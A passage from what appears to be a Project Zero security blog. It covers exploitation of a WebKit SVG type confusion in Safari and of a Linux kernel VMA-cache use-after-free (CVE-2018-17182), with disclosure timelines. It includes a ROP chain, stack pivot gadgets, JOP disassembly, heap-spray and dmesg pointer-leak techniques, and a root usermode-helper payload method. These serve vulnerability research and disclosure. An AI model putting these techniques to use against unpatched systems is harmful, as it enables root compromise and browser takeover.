  1. resetAnimatedType() calls computeCSSPropertyValue() here, which triggers a JavaScript callback.

  1. In the JavaScript callback, we change the type of <animate> element to B by changing its attributeName attribute. This causes SVGAnimateElementBase::resetAnimatedPropertyType() to be called. In it, m_animatedType and m_animator get deleted, while m_animatedPropertyType gets set to B according to the new attributeName here. Now, m_animatedType and m_animator are null, while m_animatedPropertyType is B.

  1. We return into resetAnimatedType(), where we still have a local variable animator which still points to (freed but still functional) animator for type A.

  1. m_animatedType gets created based on the freed animator here. Now, m_animatedType is of type A, m_animatedPropertyType is B and m_animator is null.

  1. resetAnimatedType() returns, and the animator local variable pointing to the freed animator of type A gets lost, never to be seen again.

  1. Eventually, resetAnimatedType() gets called again. Since m_animator is still null, but m_animatedPropertyType is B, it creates m_animator of type B here.

  1. Since m_animatedType is non-null, instead of creating it anew, we just initialize it by calling m_animatedType->setValueAsString() here. We now have m_animatedPropertyType for type B, m_animator for type B and m_animatedType for type A.

  1. At some point, the value of the animated property gets calculated. That happens in SVGAnimateElementBase::calculateAnimatedValue() on this line by calling m_animator->calculateAnimatedValue(..., m_animatedType). Here, there is a mismatch between the m_animator (type B) and  m_animatedType (type A). However, because the mismatch wouldn’t normally occur, the animator won’t check the type of the argument (there might be some debug asserts but nothing in the release) and will attempt to write the calculated animated value of type B into the SVGAnimatedType with type A.

  1. After the animated value has been computed, it is read out as string and set to the corresponding CSS property. This happens here.

The actual type confusion only happens in step 10: there, we will write to the SVGAnimatedType of type A as if it actually was type B. The rest of the interactions with m_animatedType are not dangerous since they are simply getting and setting the value as string, an operation that is safe to do regardless of the actual type.
Note that, although the <animate> element supports animating XML properties as well as CSS properties, we can only do the above dance with CSS properties as the code for handling XML properties is different. The list of CSS properties we can work with can be found here.
So, how do we exploit this type confusion for an infoleak? The initial idea was to exploit with A = <some numeric type> and B = String. This way, when the type confusion on write occurs, a string pointer is written over a number and then we would be able to read it in step 11 above. But there is a problem with this (as well as with a large number of type combinations): The value read in step 11 must be a valid CSS property value in the context of the current animated property, otherwise it won’t be set correctly and we would not be able to read it out. For example, we were unable to find a string CSS property (from the list above) that would accept a value like 1.4e-45 or similar.
A more promising approach, due to limitations of step 11, would be to replace a numeric type with another numeric type. We had some success with A = FloatRect and B = SVGLengthListValues, which is a vector of SVGLengthValue values. Like above, this results in a vector pointer being written over FloatRect type. This sometimes leads to successfully disclosing a heap address. Why sometimes? Because the only CSS property with type SVGLengthListValues we can use is stroke-dasharray, and stroke-dasharray accepts only positive values. Thus, if lower 32-bits of the heap address we want to disclose look like a negative floating point number (i.e. the highest bit is set), then we would not be able to disclose that address. This problem can be overcome by spraying the heap with 2GB of data so that the lower 32-bits of heap addresses start becoming positive. But, since we need heap spraying anyway, there is another approach we can take.
The approach we actually ended up using is with A = SVGLengthListValues (stroke-dasharray CSS property) and B = float (stroke-miterlimit CSS property). What this type confusion does, is overwrites the lowest 32 bits of a SVGLengthValue vector with a floating point number.
Before we trigger this type confusion we need to spray the heap with approximately 4GB of data (doable on modern computers), which gives us a good probability that when we change an original heap address 0x000000XXXXXXXXXX to 0x000000XXYYYYYYYY, the resulting address is still going to be a valid heap address, especially if YYYYYYYY is high. This way, we can disclose not-quite-arbitrary data at 0x000000XX00000000 + arbitrary offset.
Why not-quite-arbitrary? Because there are still some limitations:
  1. As stroke-miterlimit must be positive, once again we can only disclose data from the heap interpretable as a 32-bit float.

  1. SVGLengthValue is a type which consists of a 32-bit float followed by an enumeration that describes the units used. When a SVGLengthValue is read out as string in step 11 above, if the unit value is valid, it will be appended to the number (e.g. ‘100px’). If we attempt to set a string like that to the stroke-miterlimit property it will fail. Thus, the next byte after the heap value we want to read must interpret as invalid unit (in which case the unit is not appended when reading out SVGLengthValue as string).

Note that both of these limitations can often be worked around by doing non-aligned reads.
Now that we have our more-or-less usable read, what do we read out? As the whole point is to defeat ASLR, we should read a pointer to an executable module. Often in exploitation, one would do that by reading out the vtable pointer of some object on the heap. However, on MacOS it appears that vtable pointers point to a separate memory region than the one containing executable code of the corresponding module. So instead of reading out a vtable pointer, we need to read a function pointer instead.
What we ended up doing is using VTTRegion objects in our heap spray. A VTTRegion object contains a Timer which contains a pointer to Function object which (in this case) contains a function pointer to VTTRegion::scrollTimerFired(). Thus, we can spray with VTTRegion objects (which takes about 10 seconds on a quite not-state-of-the-art Mac Mini) and then scan the resulting memory for a function pointer.
This gives us the ASLR bypass, but one other thing useful to have for the next phase is the address of the payload (ROP chain and shellcode). We disclose it by the following steps:
  1. Find a VTTRegion object in the heap spray.

  1. By setting the VTTRegion.height property during the heap spray to an index in the spray array, we can identify exactly which of the millions of VTTRegion objects we just read.

  1. Set the VTTRegion.id property of the VTTRegion object to the payload.

  1. Read out the VTTRegion.id pointer.

We are now ready for triggering the vulnerability a second time, this time for code exec. This time, it is the classic use-after-free exploitation scenario: we overwrite the freed SVGAnimatedTypeAnimator object with the data we control.
As Apple recently introduced gigacage (a separate large region of memory) for a lot of attacker-controlled datatypes (strings, arrays, etc.) this is no longer trivial. However, one thing still allocated on the main heap is Vector content. By finding a vector whose content we fully control, we can overcome the heap limitations.
What I ended up using is a temporary vector used when TypedArray.set() is called to copy values from one JavaScript typed array into another typed array. This vector is temporary, meaning it will be deleted immediately after use, but again, due to how memory allocation works in webkit it is not too horrible. Like other stability improvements, the task of finding a more permanent controllable allocation is left to the exercise of the reader. :-)
This time, in the JavaScript event handler, we can replace the freed SVGAnimatedTypeAnimator with a vector whose first 8 bytes are set to point to the ROP chain + shellcode payload.
The ROP chain is pretty straightforward, but one thing that is perhaps more interesting is the stack pivot gadget (or, in this case, gadgets) used. In the scenario we have, the virtual function on the freed object is called as
call qword ptr [rax+10h]
where rax points to our payload. Additionally, rsi points to the freed object (that we now also control). The first thing we want to do for ROP is control the stack, but I was unable to find any “classic” gadgets that accomplish this such as
mov rsp, rax; ret;push rax; pop rsp; ret;xchg rax, rsp; ret;
What I ended up doing is breaking the stack pivot into two gadgets:
push rax; mov rax, [rsi], call [rax + offset];
This first gadget pushes the payload address on the stack and is very common because, after all, that’s exactly how the original virtual function was called (apart from push rax that can be an epilogue of some other instruction). The second gadget can then be
pop whatever; pop rsp; ret;
where the first pop pops the return address from the stack and the second pop finally gets the controlled value into rsp. This gadget is less common, but still appears to be way more common than the stack pivot mentioned previously, at least in our binary.
The final ROP chain is (remember to start reading from offset 0x10):
[address of pop; pop; pop; ret]0[address of push rax; mov rax, [rsi], call [rax+0x28]];0[address of pop; ret][address of pop rbp; pop rsp; ret;][address of pop rdi; ret]0[address of pop rsi; ret]shellcode length[address of pop rdx; ret]PROT_EXEC + PROT_READ + PROT_WRITE[address of pop rcx; ret]MAP_ANON + MAP_PRIVATE[address of pop r8; pop rbp; ret]-10[address of pop r9; ret]0[address of mmap][address of push rax; pop rdi; ret][address of push rsp; pop rbp; ret][address of push rbp; pop rax; ret][address of add rax, 0x50; pop rbp; ret]0[address of push rax; pop rsi; pop rbp; ret]0[address of pop rdx; ret]shellcode length[address of memcpy][address of jmp rax;]0shellcode
The ROP chain calls
mmap(0, shellcode_length,  PROT_EXEC | PROT_READ | PROT_WRITE, MAP_ANON + MAP_PRIVATE, -1, 0)
Then calculates the shellcode address and copies it to the address returned by mmap(), after which the shellcode is called.
In our case, the shellcode is just a sequence of ‘int 3’ instructions and when reaching it, Safari will crash. If a debugger is attached, we can see that the shellcode was successfully reached as it will detect a breakpoint:
Process 5833 stopped* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BREAKPOINT (code=EXC_I386_BPT, subcode=0x0)    frame #0: 0x00000001b1b83001->  0x1b1b83001: int3       0x1b1b83002: int3       0x1b1b83003: int3       0x1b1b83004: int3   Target 0: (com.apple.WebKit.WebContent) stopped.
In the real-world scenario the shellcode could either be a second-stage exploit to break out of the Safari sandbox or, alternately, a payload that would turn the issue into an universal XSS, stealing cross-domain data.
The exploit was successfully tested on Mac OS 10.13.6 (build version 17G65). If you are still using this version, you might want to update. The full exploit can be seen here.
The impact of recent iOS mitigations
An interesting aspect of this exploit is that, on Safari for Mac OS it could be written in a very “old-school” way (infoleak + ROP) due to lack of control flow mitigations on the platform.
On the latest mobile hardware and in iOS 12, which was published after the exploit was already written, Apple introduced control flow mitigations by using Pointer Authentication Codes (PAC). While there are no plans to write another version of the exploit at this time, it is interesting to discuss how the exploit could be modified not to be affected by the recent mitigations.
The exploit, as presented here, consists of two parts: infoleak and getting code execution. PAC would not affect the infoleak part in any way, however it would prevent jumping to the ROP chain in the second part of the exploit, because we could not forge a correct signature for the vtable pointer.
Instead of jumping to the ROP code, the next stage of the exploit would likely need to be getting an arbitrary read-write primitive. This could potentially be accomplished by exploiting a similar type confusion that was used for the infoleak, but with a different object combination. I did notice that there are some type combinations that could result in a write (especially if the attacker already has an infoleak), but I didn’t investigate those in detail.
In the Webkit process, after the attacker has an arbitrary read-write primitive, they could find a way to overwrite JIT code (or, failing that, other data that would cause fully or partially controlled JIT code to be emitted) and achieve code execution that way.
So while the exploit could still be written, admittedly it would be somewhat more difficult to write.
On publishing the advisories
Before concluding this blog post, we want to draw some attention to how the patches for the issues listed in the blog post were announced and to the corresponding timeline. The issues were reported to Apple between June 15 and July 2nd, 2018. On September 17th 2018, Apple published security advisories for iOS 12, tvOS 12 and Safari 12 which fixed all of the issues. However, although the bugs were fixed at that time, the corresponding advisories did not initially mention them. The issues described in the blog post were only added to the advisories one week later, on September 24, 2018, when the security advisories for macOS Mojave 10.14 were also published.
To demonstrate the discrepancy between originally published advisories and the updated advisories, compare the archived version of Safari 12 advisories from September 18 here and the current version of the same advisories here (note that you might need to refresh the page if you still have the old version in your browser’s cache).
The original advisories most likely didn’t include all the issues because Apple wanted to wait for the issues to also be fixed on MacOS before adding them. However, this practice is misleading because customers interested in the Apple security advisories would most likely read them only once, when they are first released and the impression they would to get is that the product updates fix far less vulnerabilities and less severe vulnerabilities than is actually the case.
Furthermore, the practice of not publishing fixes for mobile or desktop operating systems at the same time can put the desktop customers at unnecessary risk, because attackers could reverse-engineer the patches from the mobile updates and develop exploits against desktop products, while the desktop customers would have no way to update and protect themselves.
Conclusion
While there were clearly improvements in WebKit DOM when tested with Domato, the now public fuzzer was still able to find a large number of interesting bugs in a non-overly-prohibitive number of iterations. And if a public tool was able to find that many bugs, it is expected that private ones might be even more successful.
And while it is easy to brush away such bugs as something we haven’t seen actual attackers use, that doesn’t mean it’s not happening or that it couldn’t happen, as the provided exploit demonstrates. The exploit doesn’t include a sandbox escape so it can’t be considered a full chain, however reports from other security researchers indicate that this other aspect of browser security, too, cracks under fuzzing (Note from Apple Security: this sandbox escape relies on attacking the WindowServer, access to which has been removed from the sandbox in Safari 12 on macOS Mojave 10.14). Additionally, a DOM exploit could be used to steal cross-domain data such as cookies even without a sandbox escape.
The fuzzing results might indicate that WebKit is getting fuzzed, but perhaps not with sufficient computing power to find all fuzzable, newly introduced bugs before they make it into the release version of the browser. We are hoping that this research will lead to improved user security by providing an incentive for Apple to allocate more resources into this area of browser security.
Categories: Security

A cache invalidation bug in Linux memory management

Wed, 09/26/2018 - 13:16
Posted by Jann Horn, Google Project Zero
This blogpost describes a way to exploit a Linux kernel bug (CVE-2018-17182) that exists since kernel version 3.16. While the bug itself is in code that is reachable even from relatively strongly sandboxed contexts, this blogpost only describes a way to exploit it in environments that use Linux kernels that haven't been configured for increased security (specifically, Ubuntu 18.04 with kernel linux-image-4.15.0-34-generic at version 4.15.0-34.37). This demonstrates how the kernel configuration can have a big impact on the difficulty of exploiting a kernel bug.
The bug report and the exploit are filed in our issue tracker as issue 1664.
Fixes for the issue are in the upstream stable releases 4.18.9, 4.14.71, 4.9.128, 4.4.157 and 3.16.58.The bugWhenever a userspace page fault occurs because e.g. a page has to be paged in on demand, the Linux kernel has to look up the VMA (virtual memory area; struct vm_area_struct) that contains the fault address to figure out how the fault should be handled. The slowpath for looking up a VMA (in find_vma()) has to walk a red-black tree of VMAs. To avoid this performance hit, Linux also has a fastpath that can bypass the tree walk if the VMA was recently used.
The implementation of the fastpath has changed over time; since version 3.15, Linux uses per-thread VMA caches with four slots, implemented in mm/vmacache.c and include/linux/vmacache.h. Whenever a successful lookup has been performed through the slowpath, vmacache_update() stores a pointer to the VMA in an entry of the array current->vmacache.vmas, allowing the next lookup to use the fastpath.
Note that VMA caches are per-thread, but VMAs are associated with a whole process (more precisely with a struct mm_struct; from now on, this distinction will largely be ignored, since it isn't relevant to this bug). Therefore, when a VMA is freed, the VMA caches of all threads must be invalidated - otherwise, the next VMA lookup would follow a dangling pointer. However, since a process can have many threads, simply iterating through the VMA caches of all threads would be a performance problem.
To solve this, both the struct mm_struct and the per-thread struct vmacache are tagged with sequence numbers; when the VMA lookup fastpath discovers in vmacache_valid() that current->vmacache.seqnum and current->mm->vmacache_seqnum don't match, it wipes the contents of the current thread's VMA cache and updates its sequence number.
The sequence numbers of the mm_struct and the VMA cache were only 32 bits wide, meaning that it was possible for them to overflow. To ensure that a VMA cache can't incorrectly appear to be valid when current->mm->vmacache_seqnum has actually been incremented 232 times, vmacache_invalidate() (the helper that increments current->mm->vmacache_seqnum) had a special case: When current->mm->vmacache_seqnum wrapped to zero, it would call vmacache_flush_all() to wipe the contents of all VMA caches associated with current->mm. Executing vmacache_flush_all() was very expensive: It would iterate over every thread on the entire machine, check which struct mm_struct it is associated with, then if necessary flush the thread's VMA cache.
In version 3.16, an optimization was added: If the struct mm_struct was only associated with a single thread, vmacache_flush_all() would do nothing, based on the realization that every VMA cache invalidation is preceded by a VMA lookup; therefore, in a single-threaded process, the VMA cache's sequence number is always close to the mm_struct's sequence number:
/* * Single threaded tasks need not iterate the entire * list of process. We can avoid the flushing as well * since the mm's seqnum was increased and don't have * to worry about other threads' seqnum. Current's * flush will occur upon the next lookup. */ if (atomic_read(&mm->mm_users) == 1) return;
However, this optimization is incorrect because it doesn't take into account what happens if a previously single-threaded process creates a new thread immediately after the mm_struct's sequence number has wrapped around to zero. In this case, the sequence number of the first thread's VMA cache will still be 0xffffffff, and the second thread can drive the mm_struct's sequence number up to 0xffffffff again. At that point, the first thread's VMA cache, which can contain dangling pointers, will be considered valid again, permitting the use of freed VMA pointers in the first thread's VMA cache.
The bug was fixed by changing the sequence numbers to 64 bits, thereby making an overflow infeasible, and removing the overflow handling logic.Reachability and ImpactFundamentally, this bug can be triggered by any process that can run for a sufficiently long time to overflow the reference counter (about an hour if MAP_FIXED is usable) and has the ability to use mmap()/munmap() (to manage memory mappings) and clone() (to create a thread). These syscalls do not require any privileges, and they are often permitted even in seccomp-sandboxed contexts, such as the Chrome renderer sandbox (mmap, munmap, clone), the sandbox of the main gVisor host component, and Docker's seccomp policy.
To make things easy, my exploit uses various other kernel interfaces, and therefore doesn't just work from inside such sandboxes; in particular, it uses /dev/kmsg to read dmesg logs and uses an eBPF array to spam the kernel's page allocator with user-controlled, mutable single-page allocations. However, an attacker willing to invest more time into an exploit would probably be able to avoid using such interfaces.
Interestingly, it looks like Docker in its default config doesn't prevent containers from accessing the host's dmesg logs if the kernel permits dmesg access for normal users - while /dev/kmsg doesn't exist in the container, the seccomp policy whitelists the syslog() syscall for some reason.BUG_ON(), WARN_ON_ONCE(), and dmesgThe function in which the first use-after-free access occurs is vmacache_find(). When this function was first added - before the bug was introduced -, it accessed the VMA cache as follows:
      for (i = 0; i < VMACACHE_SIZE; i++) {               struct vm_area_struct *vma = current->vmacache[i];
              if (vma && vma->vm_start <= addr && vma->vm_end > addr) {                       BUG_ON(vma->vm_mm != mm);                       return vma;               }       }
When this code encountered a cached VMA whose bounds contain the supplied address addr, it checked whether the VMA's ->vm_mm pointer matches the expected mm_struct - which should always be the case, unless a memory safety problem has happened -, and if not, terminated with a BUG_ON() assertion failure. BUG_ON() is intended to handle cases in which a kernel thread detects a severe problem that can't be cleanly handled by bailing out of the current context. In a default upstream kernel configuration, BUG_ON() will normally print a backtrace with register dumps to the dmesg log buffer, then forcibly terminate the current thread. This can sometimes prevent the rest of the system from continuing to work properly - for example, if the crashing code held an important lock, any other thread that attempts to take that lock will then deadlock -, but it is often successful in keeping the rest of the system in a reasonably usable state. Only when the kernel detects that the crash is in a critical context such as an interrupt handler, it brings down the whole system with a kernel panic.
The same handler code is used for dealing with unexpected crashes in kernel code, like page faults and general protection faults at non-whitelisted addresses: By default, if possible, the kernel will attempt to terminate only the offending thread.
The handling of kernel crashes is a tradeoff between availability, reliability and security. A system owner might want a system to keep running as long as possible, even if parts of the system are crashing, if a sudden kernel panic would cause data loss or downtime of an important service. Similarly, a system owner might want to debug a kernel bug on a live system, without an external debugger; if the whole system terminated as soon as the bug is triggered, it might be harder to debug an issue properly.On the other hand, an attacker attempting to exploit a kernel bug might benefit from the ability to retry an attack multiple times without triggering system reboots; and an attacker with the ability to read the crash log produced by the first attempt might even be able to use that information for a more sophisticated second attempt.
The kernel provides two sysctls that can be used to adjust this behavior, depending on the desired tradeoff:
  • kernel.panic_on_oops will automatically cause a kernel panic when a BUG_ON() assertion triggers or the kernel crashes; its initial value can be configured using the build configuration variable CONFIG_PANIC_ON_OOPS. It is off by default in the upstream kernel - and enabling it by default in distributions would probably be a bad idea -, but it is e.g. enabled by Android.
  • kernel.dmesg_restrict controls whether non-root users can access dmesg logs, which, among other things, contain register dumps and stack traces for kernel crashes; its initial value can be configured using the build configuration variable CONFIG_SECURITY_DMESG_RESTRICT. It is off by default in the upstream kernel, but is enabled by some distributions, e.g. Debian. (Android relies on SELinux to block access to dmesg.)

Ubuntu, for example, enables neither of these.

The code snippet from above was amended in the same month as it was committed:
      for (i = 0; i < VMACACHE_SIZE; i++) {                struct vm_area_struct *vma = current->vmacache[i]; -               if (vma && vma->vm_start <= addr && vma->vm_end > addr) {-                       BUG_ON(vma->vm_mm != mm);+               if (!vma)+                       continue;+               if (WARN_ON_ONCE(vma->vm_mm != mm))+                       break;+               if (vma->vm_start <= addr && vma->vm_end > addr)                        return vma;-               }        }
This amended code is what distributions like Ubuntu are currently shipping.
The first change here is that the sanity check for a dangling pointer happens before the address comparison. The second change is somewhat more interesting: BUG_ON() is replaced with WARN_ON_ONCE().
WARN_ON_ONCE() prints debug information to dmesg that is similar to what BUG_ON() would print. The differences to BUG_ON() are that WARN_ON_ONCE() only prints debug information the first time it triggers, and that execution continues: Now when the kernel detects a dangling pointer in the VMA cache lookup fastpath - in other words, when it heuristically detects that a use-after-free has happened -, it just bails out of the fastpath and falls back to the red-black tree walk. The process continues normally.
This fits in with the kernel's policy of attempting to keep the system running as much as possible by default; if an accidental use-after-free bug occurs here for some reason, the kernel can probably heuristically mitigate its effects and keep the process working.
The policy of only printing a warning even when the kernel has discovered a memory corruption is problematic for systems that should kernel panic when the kernel notices security-relevant events like kernel memory corruption. Simply making WARN() trigger kernel panics isn't really an option because WARN() is also used for various events that are not important to the kernel's security. For this reason, a few uses of WARN_ON() in security-relevant places have been replaced with CHECK_DATA_CORRUPTION(), which permits toggling the behavior between BUG() and WARN() at kernel configuration time. However, CHECK_DATA_CORRUPTION() is only used in the linked list manipulation code and in addr_limit_user_check(); the check in the VMA cache, for example, still uses a classic WARN_ON_ONCE().

A third important change was made to this function; however, this change is relatively recent and will first be in the 4.19 kernel, which hasn't been released yet, so it is irrelevant for attacking currently deployed kernels.
      for (i = 0; i < VMACACHE_SIZE; i++) {-               struct vm_area_struct *vma = current->vmacache.vmas[i];+               struct vm_area_struct *vma = current->vmacache.vmas[idx]; -               if (!vma)-                       continue;-               if (WARN_ON_ONCE(vma->vm_mm != mm))-                       break;-               if (vma->vm_start <= addr && vma->vm_end > addr) {-                       count_vm_vmacache_event(VMACACHE_FIND_HITS);-                       return vma;+               if (vma) {+#ifdef CONFIG_DEBUG_VM_VMACACHE+                       if (WARN_ON_ONCE(vma->vm_mm != mm))+                               break;+#endif+                       if (vma->vm_start <= addr && vma->vm_end > addr) {+                               count_vm_vmacache_event(VMACACHE_FIND_HITS);+                               return vma;+                       }                }+               if (++idx == VMACACHE_SIZE)+                       idx = 0;        }
After this change, the sanity check is skipped altogether unless the kernel is built with the debugging option CONFIG_DEBUG_VM_VMACACHE.The exploit: Incrementing the sequence numberThe exploit has to increment the sequence number roughly 233 times. Therefore, the efficiency of the primitive used to increment the sequence number is important for the runtime of the whole exploit.
It is possible to cause two sequence number increments per syscall as follows: Create an anonymous VMA that spans three pages. Then repeatedly use mmap() with MAP_FIXED to replace the middle page with an equivalent VMA. This causes mmap() to first split the VMA into three VMAs, then replace the middle VMA, and then merge the three VMAs together again, causing VMA cache invalidations for the two VMAs that are deleted while merging the VMAs.The exploit: Replacing the VMAEnumerating all potential ways to attack the use-after-free without releasing the slab's backing page (according to /proc/slabinfo, the Ubuntu kernel uses one page per vm_area_struct slab) back to the buddy allocator / page allocator:
  1. Get the vm_area_struct reused in the same process. The process would then be able to use this VMA, but this doesn't result in anything interesting, since the VMA caches of the process would be allowed to contain pointers to the VMA anyway.
  2. Free the vm_area_struct such that it is on the slab allocator's freelist, then attempt to access it. However, at least the SLUB allocator that Ubuntu uses replaces the first 8 bytes of the vm_area_struct (which contain vm_start, the userspace start address) with a kernel address. This makes it impossible for the VMA cache lookup function to return it, since the condition vma->vm_start <= addr && vma->vm_end > addr can't be fulfilled, and therefore nothing interesting happens.
  3. Free the vm_area_struct such that it is on the slab allocator's freelist, then allocate it in another process. This would (with the exception of a very narrow race condition that can't easily be triggered repeatedly) result in hitting the WARN_ON_ONCE(), and therefore the VMA cache lookup function wouldn't return the VMA.
  4. Free the vm_area_struct such that it is on the slab allocator's freelist, then make an allocation from a slab that has been merged with the vm_area_struct slab. This requires the existence of an aliasing slab; in a Ubuntu 18.04 VM, no such slab seems to exist.

Therefore, to exploit this bug, it is necessary to release the backing page back to the page allocator, then reallocate the page in some way that permits placing controlled data in it. There are various kernel interfaces that could be used for this; for example:
pipe pages:
  • advantage: not wiped on allocation
  • advantage: permits writing at an arbitrary in-page offset if splice() is available
  • advantage: page-aligned
  • disadvantage: can't do multiple writes without first freeing the page, then reallocating it

BPF maps:
  • advantage: can repeatedly read and write contents from userspace
  • advantage: page-aligned
  • disadvantage: wiped on allocation

This exploit uses BPF maps.The exploit: Leaking pointers from dmesgThe exploit wants to have the following information:
  • address of the mm_struct
  • address of the use-after-free'd VMA
  • load address of kernel code

At least in the Ubuntu 18.04 kernel, the first two of these are directly visible in the register dump triggered by WARN_ON_ONCE(), and can therefore easily be extracted from dmesg: The mm_struct's address is in RDI, and the VMA's address is in RAX. However, an instruction pointer is not directly visible because RIP and the stack are symbolized, and none of the general-purpose registers contain an instruction pointer.
A kernel backtrace can contain multiple sets of registers: When the stack backtracing logic encounters an interrupt frame, it generates another register dump. Since we can trigger the WARN_ON_ONCE() through a page fault on a userspace address, and page faults on userspace addresses can happen at any userspace memory access in syscall context (via copy_from_user()/copy_to_user()/...), we can pick a call site that has the relevant information in a register from a wide range of choices. It turns out that writing to an eventfd triggers a usercopy while R8 still contains the pointer to the eventfd_fops structure.
When the exploit runs, it replaces the VMA with zeroed memory, then triggers a VMA lookup against the broken VMA cache, intentionally triggering the WARN_ON_ONCE(). This generates a warning that looks as follows - the leaks used by the exploit are highlighted:
[ 3482.271265] WARNING: CPU: 0 PID: 1871 at /build/linux-SlLHxe/linux-4.15.0/mm/vmacache.c:102 vmacache_find+0x9c/0xb0[...][ 3482.271298] RIP: 0010:vmacache_find+0x9c/0xb0[ 3482.271299] RSP: 0018:ffff9e0bc2263c60 EFLAGS: 00010203[ 3482.271300] RAX: ffff8c7caf1d61a0 RBX: 00007fffffffd000 RCX: 0000000000000002[ 3482.271301] RDX: 0000000000000002 RSI: 00007fffffffd000 RDI: ffff8c7c214c7380[ 3482.271301] RBP: ffff9e0bc2263c60 R08: 0000000000000000 R09: 0000000000000000[ 3482.271302] R10: 0000000000000000 R11: 0000000000000000 R12: ffff8c7c214c7380[ 3482.271303] R13: ffff9e0bc2263d58 R14: ffff8c7c214c7380 R15: 0000000000000014[ 3482.271304] FS:  00007f58c7bf6a80(0000) GS:ffff8c7cbfc00000(0000) knlGS:0000000000000000[ 3482.271305] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033[ 3482.271305] CR2: 00007fffffffd000 CR3: 00000000a143c004 CR4: 00000000003606f0[ 3482.271308] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000[ 3482.271309] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400[ 3482.271309] Call Trace:[ 3482.271314]  find_vma+0x1b/0x70[ 3482.271318]  __do_page_fault+0x174/0x4d0[ 3482.271320]  do_page_fault+0x2e/0xe0[ 3482.271323]  do_async_page_fault+0x51/0x80[ 3482.271326]  async_page_fault+0x25/0x50[ 3482.271329] RIP: 0010:copy_user_generic_unrolled+0x86/0xc0[ 3482.271330] RSP: 0018:ffff9e0bc2263e08 EFLAGS: 00050202[ 3482.271330] RAX: 00007fffffffd008 RBX: 0000000000000008 RCX: 0000000000000001[ 3482.271331] RDX: 0000000000000000 RSI: 00007fffffffd000 RDI: ffff9e0bc2263e30[ 3482.271332] RBP: ffff9e0bc2263e20 R08: ffffffffa7243680 R09: 0000000000000002[ 3482.271333] R10: ffff8c7bb4497738 R11: 0000000000000000 R12: ffff9e0bc2263e30[ 3482.271333] R13: ffff8c7bb4497700 R14: ffff8c7cb7a72d80 R15: ffff8c7bb4497700[ 3482.271337]  ? _copy_from_user+0x3e/0x60[ 3482.271340]  eventfd_write+0x74/0x270[ 3482.271343]  ? common_file_perm+0x58/0x160[ 3482.271345]  ? wake_up_q+0x80/0x80[ 3482.271347]  __vfs_write+0x1b/0x40[ 3482.271348]  vfs_write+0xb1/0x1a0[ 3482.271349]  SyS_write+0x55/0xc0[ 3482.271353]  do_syscall_64+0x73/0x130[ 3482.271355]  entry_SYSCALL_64_after_hwframe+0x3d/0xa2[ 3482.271356] RIP: 0033:0x55a2e8ed76a6[ 3482.271357] RSP: 002b:00007ffe71367ec8 EFLAGS: 00000202 ORIG_RAX: 0000000000000001[ 3482.271358] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 000055a2e8ed76a6[ 3482.271358] RDX: 0000000000000008 RSI: 00007fffffffd000 RDI: 0000000000000003[ 3482.271359] RBP: 0000000000000001 R08: 0000000000000000 R09: 0000000000000000[ 3482.271359] R10: 0000000000000000 R11: 0000000000000202 R12: 00007ffe71367ec8[ 3482.271360] R13: 00007fffffffd000 R14: 0000000000000009 R15: 0000000000000000[ 3482.271361] Code: 00 48 8b 84 c8 10 08 00 00 48 85 c0 74 11 48 39 78 40 75 17 48 39 30 77 06 48 39 70 08 77 8d 83 c2 01 83 fa 04 75 ce 31 c0 5d c3 <0f> 0b 31 c0 5d c3 90 90 90 90 90 90 90 90 90 90 90 90 90 90 0f [ 3482.271381] ---[ end trace bf256b6e27ee4552 ]---
At this point, the exploit can create a fake VMA that contains the correct mm_struct pointer (leaked from RDI). It also populates other fields with references to fake data structures (by creating pointers back into the fake VMA using the leaked VMA pointer from RAX) and with pointers into the kernel's code (using the leaked R8 from the page fault exception frame to bypass KASLR).The exploit: JOP (the boring part)It is probably possible to exploit this bug in some really elegant way by abusing the ability to overlay a fake writable VMA over existing readonly pages, or something like that; however, this exploit just uses classic jump-oriented programming.
To trigger the use-after-free a second time, a writing memory access is performed on an address that has no pagetable entries. At this point, the kernel's page fault handler comes in via page_fault -> do_page_fault -> __do_page_fault -> handle_mm_fault -> __handle_mm_fault -> handle_pte_fault -> do_fault -> do_shared_fault -> __do_fault, at which point it performs an indirect call:
static int __do_fault(struct vm_fault *vmf) { struct vm_area_struct *vma = vmf->vma; int ret;
ret = vma->vm_ops->fault(vmf);
vma is the VMA structure we control, so at this point, we can gain instruction pointer control. R13 contains a pointer to vma. The JOP chain that is used from there on follows; it is quite crude (for example, it crashes after having done its job), but it works.
First, to move the VMA pointer to RDI:
ffffffff810b5c21: 49 8b 45 70           mov rax,QWORD PTR [r13+0x70]ffffffff810b5c25: 48 8b 80 88 00 00 00  mov rax,QWORD PTR [rax+0x88]ffffffff810b5c2c: 48 85 c0              test rax,raxffffffff810b5c2f: 74 08                 je ffffffff810b5c39ffffffff810b5c31: 4c 89 ef              mov rdi,r13ffffffff810b5c34: e8 c7 d3 b4 00        call ffffffff81c03000 <__x86_indirect_thunk_rax>
Then, to get full control over RDI:
ffffffff810a4aaa: 48 89 fb              mov rbx,rdiffffffff810a4aad: 48 8b 43 20           mov rax,QWORD PTR [rbx+0x20]ffffffff810a4ab1: 48 8b 7f 28           mov rdi,QWORD PTR [rdi+0x28]ffffffff810a4ab5: e8 46 e5 b5 00        call ffffffff81c03000 <__x86_indirect_thunk_rax>
At this point, we can call into run_cmd(), which spawns a root-privileged usermode helper, using a space-delimited path and argument list as its only argument. This gives us the ability to run a binary we have supplied with root privileges. (Thanks to Mark for pointing out that if you control RDI and RIP, you don't have to try to do crazy things like flipping the SM*P bits in CR4, you can just spawn a usermode helper...)
After launching the usermode helper, the kernel crashes with a page fault because the JOP chain doesn't cleanly terminate; however, since that only kills the process in whose context the fault occured, it doesn't really matter.Fix timelineThis bug was reported 2018-09-12. Two days later, 2018-09-14, a fix was in the upstream kernel tree. This is exceptionally fast, compared to the fix times of other software vendors. At this point, downstream vendors could theoretically backport and apply the patch. The bug is essentially public at this point, even if its security impact is obfuscated by the commit message, which is frequently demonstrated by grsecurity.
However, a fix being in the upstream kernel does not automatically mean that users' systems are actually patched. The normal process for shipping fixes to users who use distribution kernels based on upstream stable branches works roughly as follows:
  1. A patch lands in the upstream kernel.
  2. The patch is backported to an upstream-supported stable kernel.
  3. The distribution merges the changes from upstream-supported stable kernels into its kernels.
  4. Users install the new distribution kernel.

Note that the patch becomes public after step 1, potentially allowing attackers to develop an exploit, but users are only protected after step 4.
